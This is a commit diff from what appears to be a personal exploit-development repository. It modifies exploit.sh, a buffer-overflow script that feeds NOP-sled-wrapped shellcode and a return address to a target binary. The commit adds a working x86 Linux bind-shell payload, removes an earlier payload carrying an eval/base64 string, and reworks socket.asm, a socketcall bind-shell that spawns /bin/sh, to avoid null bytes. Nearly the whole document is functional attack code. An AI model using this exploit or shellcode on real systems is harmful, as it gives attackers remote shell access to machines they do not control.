aboutsummaryrefslogtreecommitdiff
diff options
context:
space:
mode:
Diffstat
-rwxr-xr-xexploit.sh10
-rw-r--r--shellcode/simple2.c9
-rw-r--r--shellcode/socket.asm17
3 files changed, 15 insertions, 21 deletions
diff --git a/exploit.sh b/exploit.sh
index 2253e30..3bbc161 100755
--- a/exploit.sh
+++ b/exploit.sh
@@ -5,10 +5,8 @@
# 117xNOP (0x90) + shellcode(70) + 117xNOP (0x90) + return addr
-./overflow `python -c 'print "\x90"*117 + "\xd9\xcd\xd9\x74\x24\xf4\xbf\xc9\x14\x15\x14\x5d\x31\xc9\xb1\x0b\x83\xc5\x04\x31\x7d\x16\x03\x7d\x16\xe2\x3c\x7e\x1e\x4c\x27\x2d\x46\x04\x7a\xb1\x0f\x33\xec\x1a\x63\xd4\xec\x0c\xac\x46\x85\xa2\x3b\x65\x07\xd3\x34\x6a\xa7\x23\x6a\x08\xce\x4d\x5b\xbf\x78\x92\xf4\x6c\xf1\x73\x37\x12" + "\x90"*117 + "\x8c\xd3\xff\xff"'`
+#./overflow `python -c 'print "\x90"*117 + "\xd9\xcd\xd9\x74\x24\xf4\xbf\xc9\x14\x15\x14\x5d\x31\xc9\xb1\x0b\x83\xc5\x04\x31\x7d\x16\x03\x7d\x16\xe2\x3c\x7e\x1e\x4c\x27\x2d\x46\x04\x7a\xb1\x0f\x33\xec\x1a\x63\xd4\xec\x0c\xac\x46\x85\xa2\x3b\x65\x07\xd3\x34\x6a\xa7\x23\x6a\x08\xce\x4d\x5b\xbf\x78\x92\xf4\x6c\xf1\x73\x37\x12" + "\x90"*117 + "\x8c\xd3\xff\xff"'`
-# shellcode/simple.c
-#./overflow `python -c 'print "\x90"*117 + "\xbb\xd3\x92\x56\xa9\xd9\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x0f\x31\x5a\x12\x83\xc2\x04\x03\x89\x9c\xb4\x5c\xc6\x5f\x38\x9f\x18\xa0\x39\x9f\x0c\xa0\x39\x9f\x2c\xa0\x39\x9f\x2d\xda\x6b\x9f\x2c\x62\x9c\x9e\x35\x9e\x9b\xa8\xd9\x9f\xa3\xa8\xcd\x9f\xa3\xa8\xf1\x9f\xa3\xa8\xd1\x5f\x5c\x57\xe3\x9f\xa3\xa8\xe3\x9f\xa3\xa8\xe3\x9f\xa3\xa8" + "\x90"*104 + "\x8c\xd3\xff\xff"'`
-
-# shellcode/simple2.c (257 bytes)
-#./overflow `python -c 'print "\x90"*117 + "\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x53\x49\x31\x30\x4a\x50\x71\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x41\x67\x41\x41\x41\x4c\x6f\x47\x41\x41\x41\x41\x75\x41\x51\x41\x41\x41\x49\x50\x42\x63\x4e\x51\x36\x4f\x50\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x72\x2e\x63\x68\x72\x28\x34\x33\x29\x2e\x51\x41\x55\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x46\x36\x55\x67\x41\x42\x65\x42\x41\x42\x47\x77\x77\x48\x43\x4a\x41\x42\x41\x41\x41\x55\x41\x41\x41\x41\x48\x41\x41\x41\x41\x4d\x44\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x38\x58\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x55\x41\x41\x41\x41\x4e\x41\x41\x41\x41\x4c\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x38\x49\x41\x41\x41\x41\x41\x45\x45\x4f\x45\x41\x41\x41\x41\x41\x41\x29\x29\x3b" + "\x90"*104 + "\x8c\xd3\xff\xff"'`
+# bindshell
+# 85 bytes NOP + 134 bytes shellcode + 85 bytes NOP
+./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\x8c\xd3\xff\xff"'`
diff --git a/shellcode/simple2.c b/shellcode/simple2.c
deleted file mode 100644
index 341b2de..0000000
--- a/shellcode/simple2.c
+++ /dev/null
@@ -1,9 +0,0 @@
-#include <stdio.h>
-#include <stdlib.h>
-
-int _start(void) {
- while (1) {
- //printf("Shellcode!\n");
- }
- return (0);
-}
diff --git a/shellcode/socket.asm b/shellcode/socket.asm
index 76b8103..1cbd9d4 100644
--- a/shellcode/socket.asm
+++ b/shellcode/socket.asm
@@ -3,9 +3,10 @@ BITS 32
; socket()
xor eax,eax ; zero out eax
+xor ebx,ebx ; " " ebx
push eax ; push 0x0 on the stack: arg3(protocol) -> 0
-mov ebx,0x01 ; socket sub-syscall: 0x01 -> socket()
-push 0x01 ; socket type: 0x01 -> SOCK_STREAM
+mov bl,0x1 ; socket sub-syscall: 0x01 -> socket()
+push ebx ; socket type: 0x01 -> SOCK_STREAM
push 0x02 ; socket domain: 0x02 -> AF_INET
mov ecx,esp ; let ecx point to our structure above
mov al,0x66 ; socketcall syscall 0x66
@@ -25,7 +26,8 @@ push edx ; arg1: push sockfd
; arg2
mov ecx,esp ; move stack pointer to reg (conform to socketcall)
; arg1
-mov ebx,0x02 ; set socket subcall to 0x03 (bind)
+xor ebx,ebx
+mov bl,0x2 ; set socket subcall to 0x03 (bind)
mov al,0x66 ; socketcall syscall
int 0x80 ; let the kernel do the stuff
@@ -35,7 +37,8 @@ push eax ; backlog
push edx ; sockfd
mov ecx,esp ; save stackptr
mov al,0x66 ; socketcall()
-mov ebx,0x4 ; socketcall 0x4 -> listen()
+xor ebx,ebx
+mov bl,0x4 ; socketcall 0x4 -> listen()
int 0x80 ; kernel mode
; accept()
@@ -49,7 +52,8 @@ push esp ; pointer to sock addrlen
push ecx ; push sockaddr_in
push edx ; sockfd
mov ecx,esp
-mov ebx,0x5
+xor ebx,ebx
+mov bl,0x5
mov al,0x66
int 0x80
@@ -78,5 +82,6 @@ int 0x80
; exit()
mov al,0x1 ; exit syscall
-mov ebx,0x42 ; return code
+xor ebx,ebx
+mov bl,0x42 ; return code
int 0x80 ; kernel mode
Powered by cgit, Themed by Ted Yin.